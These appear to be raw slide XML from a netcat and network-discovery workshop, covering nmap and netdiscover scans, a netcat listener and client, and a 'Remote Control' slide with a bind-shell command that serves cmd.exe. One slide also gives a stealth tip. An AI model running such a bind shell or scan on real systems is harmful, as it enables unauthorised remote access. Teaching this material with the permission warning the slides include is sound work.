            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0"/>
          <a:p>
            <a:pPr marL="91440" indent="-91080">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="e48312"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char=" "/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="5eb2ea"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://netcat.sourceforge.net/</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> </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How do you establish a connection between systems? netcat</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A client and a server. For chatting, file transferring and port scanning. (Backdoors)</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 Sys admins generally make sure net cat is not installed in their systems why? </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>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1097280" y="286560"/>
            <a:ext cx="10058040" cy="1450440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4800" spc="-49" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>How would you find IP address. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1845720"/>
            <a:ext cx="10058040" cy="4023000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0"/>
          <a:p>
            <a:pPr marL="91440" indent="-91080">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="e48312"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char=" "/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="5eb2ea"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>https://www.advanced-ip-scanner.com/</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using NMAP (recall) nmap –sn 192.168.1.0/24</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Android</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u="sng">
                <a:solidFill>
                  <a:srgbClr val="5eb2ea"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://play.google.com/store/apps/details?id=com.myprog.netutils&amp;hl=en_US</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t> </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Kali (Linux)</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netdiscover –p (To not get caught, may take a while)</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your IP: hostname -I</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>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1097280" y="286560"/>
            <a:ext cx="10058040" cy="1450440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4800" spc="-49" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Hands on </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1845720"/>
            <a:ext cx="10058040" cy="4023000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>To open a port using netcat, type in the following. </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Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>nc -l -p 666</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" marL="384120" indent="-182520">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="201"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="400"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="e48312"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>-l stand for listener, p is for port. You are listening in port 666</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>You are listening, but for what? </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>The client. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="251640" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="e48312"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" charset="2"/>
              <a:buChar char=""/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>nc Local_IP 666</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>You may face a problem here. When binding, why would you receive “permission denied” </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>opening port 666 may be reserved. Ports below 1024 are called “privileged ports” </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>- You can send messages, and so what? why not just use Facebook? </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>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1097280" y="286560"/>
            <a:ext cx="10058040" cy="1450440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4800" spc="-49" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Remote Control (Open File on GitHub)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="177" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1845720"/>
            <a:ext cx="10058040" cy="4023000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0"/>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Server: </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nc –Lp 666 –vv –e cmd.exe</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Client: </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nc 192.0.0.1 666 </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>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45000"/>
          </a:srgbClr>
        </a:solidFill>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="178" name="CustomShape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3240" y="6400800"/>
            <a:ext cx="121885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79" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6334200"/>
            <a:ext cx="121885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80" name="Line 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1207440" y="4343400"/>
            <a:ext cx="9875520" cy="36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181" name="CustomShape 4"/>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82" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="321480" y="320040"/>
            <a:ext cx="11548440" cy="6217560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="127080">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1">
              <a:shade val="50000"/>
            </a:schemeClr>
          </a:lnRef>
          <a:fillRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="183" name="TextShape 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="902880" y="1313280"/>
            <a:ext cx="6765840" cy="4927320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="5400" spc="-49" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Thank You</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="5400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="184" name="TextShape 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4793760" y="2042640"/>
            <a:ext cx="5945400" cy="4105800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1600" spc="199" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:srgbClr val="637052"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>Ramiro Gonzalez &amp; Lorenzo Scaturchio</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1600" spc="199" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:srgbClr val="637052"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>rgonzalez69@ucmerced.edu</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="1600" spc="199" strike="noStrike" cap="all">
                <a:solidFill>
                  <a:srgbClr val="637052"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>209-962-2524</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185" name="Line 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4055760" y="2057040"/>
            <a:ext cx="360" cy="2743200"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19080">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="186" name="Graphic 6" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4175640" y="1826640"/>
            <a:ext cx="687600" cy="687600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="187" name="Graphic 8" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4168800" y="4233600"/>
            <a:ext cx="685800" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="188" name="Graphic 12" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4121280" y="3313080"/>
            <a:ext cx="687600" cy="687600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="189" name="Graphic 16" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4175640" y="2590920"/>
            <a:ext cx="633600" cy="633600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="190" name="Picture 20" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8528040" y="4941000"/>
            <a:ext cx="3103200" cy="2068560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="191" name="Picture 35" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9493920" y="241560"/>
            <a:ext cx="2490840" cy="249084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1097280" y="286560"/>
            <a:ext cx="10058040" cy="1450440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b"/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="85000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4800" spc="-49" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri Light"/>
              </a:rPr>
              <a:t>WARNING</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1845720"/>
            <a:ext cx="10058040" cy="4023000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="91440" indent="-91080" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1199"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="201"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="e48312"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char=" "/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="ff0000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
              </a:rPr>
              <a:t>Before network scanning make sure you have explicitly written permission. Or else contact your local laywer. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="404040"/>
